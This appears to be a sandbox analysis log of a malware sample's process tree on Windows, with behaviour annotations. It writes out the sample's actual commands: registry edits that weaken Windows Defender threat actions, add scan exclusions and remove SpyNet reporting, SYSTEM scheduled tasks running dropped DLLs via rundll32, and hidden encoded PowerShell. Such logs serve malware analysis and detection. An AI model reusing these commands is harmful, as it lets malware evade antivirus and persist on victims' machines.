C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2944
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4440
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:4464
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3476
-
C:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC\PuBYwzPVDRszCTi\nOqoXWB.exeC:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC\PuBYwzPVDRszCTi\nOqoXWB.exe Ko /YAsite_idmXK 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:428
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:2140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2572
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KJXFElJjZabuIxmUcOR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KJXFElJjZabuIxmUcOR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WASabAiYZoPU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WASabAiYZoPU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gPtoEFCUU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gPtoEFCUU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gVmmTejSMDqsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gVmmTejSMDqsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xTRsizlJSGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xTRsizlJSGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CTJjJnZaTLQnbGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CTJjJnZaTLQnbGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\pNRMKCwFqwdxSFZt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\pNRMKCwFqwdxSFZt\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1192 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KJXFElJjZabuIxmUcOR" /t REG_DWORD /d 0 /reg:323⤵PID:2676
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KJXFElJjZabuIxmUcOR" /t REG_DWORD /d 0 /reg:324⤵PID:3952
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KJXFElJjZabuIxmUcOR" /t REG_DWORD /d 0 /reg:643⤵PID:3972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WASabAiYZoPU2" /t REG_DWORD /d 0 /reg:323⤵PID:3568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WASabAiYZoPU2" /t REG_DWORD /d 0 /reg:643⤵PID:4508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gPtoEFCUU" /t REG_DWORD /d 0 /reg:323⤵PID:4344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gPtoEFCUU" /t REG_DWORD /d 0 /reg:643⤵PID:4920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gVmmTejSMDqsC" /t REG_DWORD /d 0 /reg:323⤵PID:4340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gVmmTejSMDqsC" /t REG_DWORD /d 0 /reg:643⤵PID:2800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xTRsizlJSGUn" /t REG_DWORD /d 0 /reg:323⤵PID:4196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xTRsizlJSGUn" /t REG_DWORD /d 0 /reg:643⤵PID:2076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CTJjJnZaTLQnbGVB /t REG_DWORD /d 0 /reg:323⤵PID:2012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CTJjJnZaTLQnbGVB /t REG_DWORD /d 0 /reg:643⤵PID:1228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC /t REG_DWORD /d 0 /reg:323⤵PID:1020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC /t REG_DWORD /d 0 /reg:643⤵PID:2156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\pNRMKCwFqwdxSFZt /t REG_DWORD /d 0 /reg:323⤵PID:4840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\pNRMKCwFqwdxSFZt /t REG_DWORD /d 0 /reg:643⤵PID:2952
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXkHwKJVp" /SC once /ST 13:21:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4052
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXkHwKJVp"2⤵PID:4816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXkHwKJVp"2⤵PID:3480
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MZObKWyefxVnmbFER" /SC once /ST 00:52:57 /RU "SYSTEM" /TR "\"C:\Windows\Temp\pNRMKCwFqwdxSFZt\UFnhWIcgSvJGGsa\UNFfcVL.exe\" LR /wFsite_idVwG 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5064
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MZObKWyefxVnmbFER"2⤵PID:4544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4624 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4760
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:2200
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2920
-
C:\Windows\Temp\pNRMKCwFqwdxSFZt\UFnhWIcgSvJGGsa\UNFfcVL.exeC:\Windows\Temp\pNRMKCwFqwdxSFZt\UFnhWIcgSvJGGsa\UNFfcVL.exe LR /wFsite_idVwG 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4484 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bjVqJkGFAiNaUEAvEn"2⤵PID:4884
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3192
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:424
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:504
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\gPtoEFCUU\hToiYq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VHLBDothpetOaQE" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VHLBDothpetOaQE2" /F /xml "C:\Program Files (x86)\gPtoEFCUU\Ovewfrj.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1188
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "VHLBDothpetOaQE"2⤵PID:4144
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VHLBDothpetOaQE"2⤵PID:4716
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FRyvzmFyKIKHHk" /F /xml "C:\Program Files (x86)\WASabAiYZoPU2\eiHQSGu.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KhpKPZOqlRJSL2" /F /xml "C:\ProgramData\CTJjJnZaTLQnbGVB\MVPnEJF.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BwDBMyJmAHoyGvPyR2" /F /xml "C:\Program Files (x86)\KJXFElJjZabuIxmUcOR\topXYZo.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SCWXFRoLSAnycvArdss2" /F /xml "C:\Program Files (x86)\gVmmTejSMDqsC\VHfGkrZ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1280
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "teabCtqLwEhjalrvZ" /SC once /ST 17:02:19 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\pNRMKCwFqwdxSFZt\XEKqWdtq\SVEmYHH.dll\",#1 /gNsite_idHFX 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "teabCtqLwEhjalrvZ"2⤵PID:5048
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:4168
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:3940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:352
-
